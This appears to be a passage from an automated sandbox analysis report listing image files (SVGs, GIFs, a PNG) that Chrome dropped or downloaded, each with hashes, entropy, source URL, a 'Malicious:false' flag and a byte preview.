                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):379
                                                    Entropy (8bit):4.942805876241154
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2D8F86059BE176833897099EE6DDEDEB
                                                    SHA1:93A2E327027DEED53076E86BFA7D9EEBBF0CC4B9
                                                    SHA-256:34D8DA073F47030EE94B99D84FBE68E3345BD8AAA37EA909FF2DA00238447486
                                                    SHA-512:64D75B1F35180FF61F5BF11D21544454DF016D0854573D75D277FCB933CE845D1436BDC822445B78C627A1FF730B39FC34B72C27D45A39E237F2CCF0876FCA4E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><circle cx="24" cy="24" r="24" fill="#e6e6e6"/><path d="M13.44,36h1.92a8.64,8.64,0,1,1,17.28,0h1.92a10.573,10.573,0,0,0-6.569-9.771,7.68,7.68,0,1,0-7.982,0A10.573,10.573,0,0,0,13.44,36Zm4.8-16.32A5.76,5.76,0,1,1,24,25.44,5.766,5.766,0,0,1,18.24,19.68Z" fill="#404040"/></svg>
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:GIF image data, version 89a, 352 x 3
                                                    Category:dropped
                                                    Size (bytes):2672
                                                    Entropy (8bit):6.640973516071413
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:166DE53471265253AB3A456DEFE6DA23
                                                    SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                    SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                    SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):61
                                                    Entropy (8bit):3.990210155325004
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:GIF image data, version 89a, 352 x 3
                                                    Category:downloaded
                                                    Size (bytes):3620
                                                    Entropy (8bit):6.867828878374734
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                    SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                    SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                    SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                    Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                    No static file info